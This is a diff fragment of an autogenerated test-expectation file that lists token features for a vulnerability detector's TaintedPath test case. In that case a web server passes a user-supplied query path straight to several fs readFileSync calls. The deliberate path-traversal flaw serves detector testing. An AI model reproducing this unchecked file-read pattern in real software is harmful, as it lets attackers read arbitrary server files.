path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:9:7:9:48 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:9:7:9:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:9:7:9:48 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:9:7:9:48 | path = ... ry.path | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:7:9:48 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:7:9:48 | path = ... ry.path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:9:7:9:48 | path = ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:9:7:9:48 | path = ... ry.path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:16 | url | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:16 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:16 | url | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:16 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:16 | url | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:22 | url.parse | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:22 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:22 | url.parse | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:22 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:22 | url.parse | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:37 | exceptional return of url.par ... , true) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:37 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:37 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:37 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:37 | exceptional return of url.par ... , true) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:37 | url.par ... , true) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:37 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:37 | url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:37 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:37 | url.par ... , true) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:43 | url.par ... ).query | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:43 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:43 | url.par ... ).query | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:43 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:43 | url.par ... ).query | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:48 | url.par ... ry.path | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:48 | url.par ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:48 | url.par ... ry.path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:48 | url.par ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:9:14:9:48 | url.par ... ry.path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:9:18:9:22 | parse | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:18:9:22 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:18:9:22 | parse | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:9:18:9:22 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:9:18:9:22 | parse | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:9:24:9:26 | req | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:24:9:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:24:9:26 | req | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:9:24:9:26 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:9:24:9:26 | req | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:9:24:9:30 | req.url | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/other-fs-libraries.js:9:24:9:30 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:9:24:9:30 | req.url | calleeImports | url | @@ -9829,6 +80141,11 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:9:24:9:30 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:9:24:9:30 | req.url | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:9:24:9:30 | req.url | receiverName | url | +| autogenerated/TaintedPath/other-fs-libraries.js:9:28:9:30 | url | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:28:9:30 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:28:9:30 | url | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:9:28:9:30 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:9:28:9:30 | url | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:9:33:9:36 | true | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/other-fs-libraries.js:9:33:9:36 | true | InputArgumentIndex | 1 | | autogenerated/TaintedPath/other-fs-libraries.js:9:33:9:36 | true | calleeImports | url | @@ -9838,6 +80155,41 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:9:33:9:36 | true | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:9:33:9:36 | true | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:9:33:9:36 | true | receiverName | url | +| autogenerated/TaintedPath/other-fs-libraries.js:9:39:9:43 | query | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:39:9:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:39:9:43 | query | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:9:39:9:43 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:9:39:9:43 | query | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:9:45:9:48 | path | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:45:9:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:45:9:48 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:9:45:9:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:9:45:9:48 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:11:3:11:4 | fs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:11:3:11:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:11:3:11:4 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:11:3:11:4 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:11:3:11:4 | fs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:11:3:11:17 | fs.readFileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:11:3:11:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:11:3:11:17 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:11:3:11:17 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:11:3:11:17 | fs.readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:11:3:11:23 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:11:3:11:23 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:11:3:11:23 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:11:3:11:23 | exceptional return of fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:11:3:11:23 | exceptional return of fs.read ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:11:3:11:23 | fs.read ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:11:3:11:23 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:11:3:11:23 | fs.read ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:11:3:11:23 | fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:11:3:11:23 | fs.read ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:11:6:11:17 | readFileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:11:6:11:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:11:6:11:17 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:11:6:11:17 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:11:6:11:17 | readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:11:19:11:22 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/other-fs-libraries.js:11:19:11:22 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:11:19:11:22 | path | calleeImports | fs | @@ -9847,6 +80199,31 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:11:19:11:22 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:11:19:11:22 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:11:19:11:22 | path | receiverName | fs | +| autogenerated/TaintedPath/other-fs-libraries.js:12:3:12:12 | gracefulFs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:12:3:12:12 | gracefulFs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:12:3:12:12 | gracefulFs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:12:3:12:12 | gracefulFs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:12:3:12:12 | gracefulFs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:12:3:12:25 | gracefu ... ileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:12:3:12:25 | gracefu ... ileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:12:3:12:25 | gracefu ... ileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:12:3:12:25 | gracefu ... ileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:12:3:12:25 | gracefu ... ileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:12:3:12:31 | exceptional return of gracefu ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:12:3:12:31 | exceptional return of gracefu ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:12:3:12:31 | exceptional return of gracefu ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:12:3:12:31 | exceptional return of gracefu ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:12:3:12:31 | exceptional return of gracefu ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:12:3:12:31 | gracefu ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:12:3:12:31 | gracefu ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:12:3:12:31 | gracefu ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:12:3:12:31 | gracefu ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:12:3:12:31 | gracefu ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:12:14:12:25 | readFileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:12:14:12:25 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:12:14:12:25 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:12:14:12:25 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:12:14:12:25 | readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:12:27:12:30 | path | CalleeFlexibleAccessPath | gracefulFs.readFileSync | | autogenerated/TaintedPath/other-fs-libraries.js:12:27:12:30 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:12:27:12:30 | path | calleeImports | graceful-fs | @@ -9856,6 +80233,31 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:12:27:12:30 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:12:27:12:30 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:12:27:12:30 | path | receiverName | gracefulFs | +| autogenerated/TaintedPath/other-fs-libraries.js:13:3:13:9 | fsExtra | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:13:3:13:9 | fsExtra | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:13:3:13:9 | fsExtra | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:13:3:13:9 | fsExtra | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:13:3:13:9 | fsExtra | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:13:3:13:22 | fsExtra.readFileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:13:3:13:22 | fsExtra.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:13:3:13:22 | fsExtra.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:13:3:13:22 | fsExtra.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:13:3:13:22 | fsExtra.readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:13:3:13:28 | exceptional return of fsExtra ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:13:3:13:28 | exceptional return of fsExtra ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:13:3:13:28 | exceptional return of fsExtra ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:13:3:13:28 | exceptional return of fsExtra ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:13:3:13:28 | exceptional return of fsExtra ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:13:3:13:28 | fsExtra ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:13:3:13:28 | fsExtra ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:13:3:13:28 | fsExtra ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:13:3:13:28 | fsExtra ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:13:3:13:28 | fsExtra ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:13:11:13:22 | readFileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:13:11:13:22 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:13:11:13:22 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:13:11:13:22 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| 